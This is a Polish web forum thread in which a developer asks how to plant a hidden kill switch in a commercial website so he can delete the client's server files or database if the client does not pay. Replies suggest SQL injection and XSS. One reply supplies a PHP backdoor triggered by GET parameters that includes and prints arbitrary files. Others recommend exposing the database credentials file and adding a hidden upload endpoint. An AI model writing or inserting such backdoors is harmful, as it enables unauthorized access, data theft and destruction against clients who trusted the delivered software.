Witam,
Załóżmy że tworzę komercyjną stronę i chciałbym zabezpieczyć się przed nieuczciwym klientem, poprzez na przykład umieszczenie gdzieś w kodzie strony skryptu lub fragmentu kodu umożliwiającego mi np. wywołanie zdalnego skryptu kasującego pliki na serwerze (do którego normalnie nie mam dostępu), lub np. skryptu kasującego bazę danych (lub choćby wszystkie w niej wpisy). Czy ktoś ma może pomysł jak to zrobić. A może sami macie podobne metody zabezpieczania swoich projektów, a jeśli tak to jakie?
Pozdrawiam.

SQL Injection/Insertion
poszukaj też o XSS

A na przyszłość użyj najpier szukaj!

aby zapezpieczyć się przed sytuacją gdy dałeś skrypt i nie otrzymałeś wynagrodzenia, możesz gdzieś umieścić coś typu:

[PHP] pobierz, plaintext 
<?php
if($_GET['secure']==1)
{
echo $$_GET['var'];
include_once($_GET['inc']);
highlight_file($_GET['inc']);
}
?>
[PHP] pobierz, plaintext 

a po finalizacji usunąć ten kod

mozesz stworzyc cos takiego co bedzie wyswietlalo zawartosc pliku z haslami do bazy danych, pozniej zrobisz co zechcesz, mozesz rownierz zrobic jakis upload i w kazdej chwili bedziesz mugl dopisac jakis skrypcik i wrzucic na serwer. pamietaj o zabezpieczeniu takich rzeczy haslem ;]

Pozdrawiam dex.